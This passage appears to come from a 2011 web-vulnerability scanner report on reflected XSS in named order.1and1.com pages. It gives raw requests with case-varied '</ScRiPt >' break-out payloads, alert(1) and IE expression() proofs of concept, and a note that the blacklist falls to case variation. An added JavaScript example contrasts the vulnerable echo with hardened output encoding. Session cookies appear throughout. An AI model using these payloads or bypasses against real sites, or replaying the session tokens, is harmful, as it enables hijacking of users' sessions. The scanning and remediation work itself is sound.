Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:47 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:57:54 GMT; Path=/
ETag: 905cca0b4e9d618ff10d04815b3bba6b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20910


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
ams.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingElements";UNOUNO.params.lastpage="FeatureSite-buildingElements5314a</ScRiPt >fdf961380df";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.13. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingPhotogallery

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingPhotogallery is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingPhotogallery. The payload 99bea</ScRiPt%20>57d930332ed was submitted in the REST URL parameter 3. This input was returned as 99bea</ScRiPt >57d930332ed in a subsequent request for the URL /xml/order/FeatureSite-buildingPhotogallery.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingPhotogallery99bea</ScRiPt%20>57d930332ed;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:57:23 GMT; Path=/
ETag: 22783426aba0c8ad3815820a1b8c7156
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19319


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
ionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingPhotogallery";UNOUNO.params.lastpage="FeatureSite-buildingPhotogallery99bea</ScRiPt >57d930332ed";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.14. http://order.1and1.com/xml/order/FeatureSite-buildingWsb [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingWsb

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingWsb is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingWsb. The payload 8a254</ScRiPt%20>517ec0551f8 was submitted in the REST URL parameter 3. This input was returned as 8a254</ScRiPt >517ec0551f8 in a subsequent request for the URL /xml/order/FeatureSite-buildingWsb.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingWsb8a254</ScRiPt%20>517ec0551f8;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:42:19 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=IdGk5PD0zXFxcVmlfZixkXisdJ2BTZDxTRkAoLCkpKCYoJiMjJiUfIiYZGxowLVJAbGFjcSkrJlYvWWguISIeHSIeHDY0LjYtLDVtbjQpMGBpLyIjHx4jIB0gMjU2LzA=; Expires=Fri, 07-Apr-2079 21:56:27 GMT; Path=/
ETag: 64072c23e0b5d7c6b127c44390fcf074
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20609


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingWsb";UNOUNO.params.lastpage="FeatureSite-buildingWsb8a254</ScRiPt >517ec0551f8";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.15. http://order.1and1.com/xml/order/Gtc [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Gtc

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Gtc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Gtc. The payload c5e5c</ScRiPt%20>78e706dc8a4 was submitted in the REST URL parameter 3. This input was returned as c5e5c</ScRiPt >78e706dc8a4 in a subsequent request for the URL /xml/order/Gtc.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Gtcc5e5c</ScRiPt%20>78e706dc8a4;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:37:13 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=cY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiMmISQlHh8=; Expires=Fri, 07-Apr-2079 21:51:20 GMT; Path=/
ETag: 293710f7dfa5ab5aebccd23aa4af1cf6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 119585


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
007652F99CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Gtc";UNOUNO.params.lastpage="Gtcc5e5c</ScRiPt >78e706dc8a4";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.16. http://order.1and1.com/xml/order/Home [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Home is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Home. The payload 92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d was submitted in the REST URL parameter 3. This input was returned as 92d59</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89b6bbee8d in a subsequent request for the URL /xml/order/Home.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Home92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Request 2

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:51:28 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTsuN2dwNikqJiUqJiQnJR8nHh0=; Expires=Fri, 07-Apr-2079 18:05:35 GMT; Path=/
ETag: 4aadadff388b28b120b90eb8b912244d
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36484


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
386BD5F5ED9C6322067094898.TCpfix140a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Home";UNOUNO.params.lastpage="Home92d59</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89b6bbee8d";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...
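Every finding in this section has the same shape: the page name taken from the request path is written verbatim into the double-quoted JavaScript string UNOUNO.params.lastpage="..." inside an inline script block, and the only guard is a blacklist that matches the lowercase token. The example below is added for this edit; it is not code from the scan output or from the order.1and1.com application. ROUTE_PREFIX and all function names are hypothetical, and the sample request path is constructed from Request 1 of finding 1.16. It reproduces the blacklist bypass, shows why the `</ScRiPt >` break-out works even though the injection point is a JS string (the HTML tokenizer ends the script element at the first case-insensitive "</script" before the JavaScript parser ever runs, so escaping quotes alone is not a fix), and contrasts it with the output encoding the remediation text calls for.

```javascript
// Added example; not code from the scan report or the target application.
// ROUTE_PREFIX and all function names are hypothetical. SAMPLE_PATH is
// constructed from Request 1 of finding 1.16 in this report.

const ROUTE_PREFIX = '/xml/order/';

// Everything after the route prefix, up to the ';jsessionid=' matrix
// parameter or the query string, is the page name the server echoes back
// into UNOUNO.params.lastpage.
function pathSegment(requestPath) {
  if (!requestPath.startsWith(ROUTE_PREFIX)) {
    throw new Error('unexpected route: ' + requestPath);
  }
  const rest = requestPath.slice(ROUTE_PREFIX.length).split('?')[0].split(';')[0];
  return decodeURIComponent(rest); // %20 becomes a space, as in the report
}

// Blacklist of the kind the report describes: it rejects the lowercase
// token only, so "</ScRiPt" passes straight through.
function naiveBlacklist(value) {
  if (value.includes('<script') || value.includes('</script')) {
    throw new Error('blocked by blacklist');
  }
  return value;
}

// Vulnerable rendering: the value lands verbatim inside the JS string.
function buildPageScriptVulnerable(requestPath) {
  const page = naiveBlacklist(pathSegment(requestPath));
  return '<script>UNOUNO.params.lastpage="' + page + '";</script>';
}

// Hardened rendering: every character outside [A-Za-z0-9] is emitted as a
// \uXXXX escape. The JS parser decodes it back to the original character,
// but the HTML tokenizer never sees a raw '<' or '/' in the data and the
// JS parser never sees an unescaped '"' or '\'.
function encodeForJsString(value) {
  let out = '';
  for (let i = 0; i < value.length; i++) {
    const ch = value[i];
    if (/^[A-Za-z0-9]$/.test(ch)) {
      out += ch;
    } else {
      out += '\\u' + value.charCodeAt(i).toString(16).padStart(4, '0');
    }
  }
  return out;
}

function buildPageScriptHardened(requestPath) {
  const page = encodeForJsString(pathSegment(requestPath));
  return '<script>UNOUNO.params.lastpage="' + page + '";</script>';
}

// Check to run over generated markup: does anything between the opening
// <script> and the intended closer look like "</script" to the HTML
// tokenizer? The tokenizer matches case-insensitively and runs before the
// JavaScript parser, so a JS string context offers no protection here.
function dataBreaksOutOfScript(html) {
  const start = html.indexOf('<script>') + '<script>'.length;
  const end = html.lastIndexOf('</script>');
  return /<\/script/i.test(html.slice(start, end));
}

// Constructed from Request 1 of finding 1.16.
const SAMPLE_PATH =
  '/xml/order/Home92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d' +
  ';jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912';

console.log('vulnerable:', buildPageScriptVulnerable(SAMPLE_PATH));
console.log('breaks out:', dataBreaksOutOfScript(buildPageScriptVulnerable(SAMPLE_PATH)));
console.log('hardened:  ', buildPageScriptHardened(SAMPLE_PATH));
console.log('breaks out:', dataBreaksOutOfScript(buildPageScriptHardened(SAMPLE_PATH)));
```

The \uXXXX encoding is chosen over HTML entity encoding because entities are not decoded inside a script element; `&lt;` would survive as six literal characters in the string value. Rejecting the input (for instance, restricting the page name to the known set of order pages) is the stronger fix; the encoder is what makes the remaining echo safe when the value must be emitted.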

1.17. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload 2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308 was submitted in the REST URL parameter 3. This input was returned as 2a1d6</ScRiPt ><x style=x:expression(alert(1))>596a15d5308 in a subsequent request for the URL /xml/order/Hosting.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Hosting2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
